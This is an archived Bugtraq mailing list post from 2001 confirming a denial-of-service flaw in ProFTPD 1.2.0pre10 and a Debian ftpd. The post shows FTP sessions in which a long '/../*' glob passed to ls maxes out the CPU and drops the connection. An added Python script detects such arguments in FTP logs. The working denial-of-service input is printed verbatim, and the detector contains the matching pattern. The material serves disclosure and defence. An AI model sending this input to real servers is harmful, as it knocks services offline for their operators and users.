Bugtraq mailing list archives

RE: Multiple-Vendor-FTP-Vuln. (old?)


From: "E. van Elk" <evelk () dsv nl>
Date: Tue, 21 Aug 2001 01:41:14 +0200

At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1% and after the second attempt the connection to the server is broken.

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220  FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686
unknown
230-
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1% and after the second attempt the connection to the server is broken.
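Added example, not part of the original post: a small detector that scans FTP command logs for listing arguments shaped like the `../*` chains reproduced above, so the repeated attempts that preceded the CPU spike and dropped connection can be spotted from logs. The log format, client addresses and thresholds are assumptions; the sample lines are constructed.

```python
import re

# Constructed sample log (hypothetical format "<time> <client> <verb> <arg>"),
# modelled on the session in the post: the same LIST argument sent twice.
BAD_ARG = "/../*" * 13
SAMPLE_LOG = "\n".join([
    "2001-08-21T01:41:02 10.0.0.5 LIST /pub",
    "2001-08-21T01:41:05 10.0.0.5 LIST " + BAD_ARG,
    "2001-08-21T01:41:09 10.0.0.5 NLST *.txt",
    "2001-08-21T01:41:12 10.0.0.5 LIST " + BAD_ARG,
    "2001-08-21T01:41:20 10.0.0.7 LIST ../../*/",
])

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(LIST|NLST|STAT)\s*(.*)$")

def glob_score(arg):
    """Count path components containing a wildcard and components equal to '..'.
    An argument that alternates the two makes the server expand a directory,
    step back up and expand again at every level, so the work grows quickly
    with the number of such pairs; a plain '*.txt' has one wildcard and no '..'."""
    parts = [p for p in arg.split("/") if p]
    wild = sum(1 for p in parts if any(c in p for c in "*?["))
    dotdot = sum(1 for p in parts if p == "..")
    return wild, dotdot

def is_pathological(arg, max_wild=3, max_dotdot=3):
    """Flag arguments with more wildcard and '..' components than a legitimate
    listing needs. The thresholds are assumptions; tune them to local traffic."""
    wild, dotdot = glob_score(arg)
    return wild > max_wild and dotdot > max_dotdot

def scan(log_text):
    """Return one (client, verb, arg, count) tuple per client/argument pair that
    looks pathological, counting repeats so a second attempt stands out."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, client, verb, arg = m.groups()
        if is_pathological(arg):
            key = (client, verb, arg)
            hits[key] = hits.get(key, 0) + 1
    return [(c, v, a, n) for (c, v, a), n in hits.items()]

if __name__ == "__main__":
    for client, verb, arg, n in scan(SAMPLE_LOG):
        print(f"{client} sent {verb} with {glob_score(arg)} wildcard/.. parts, {n}x")
```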

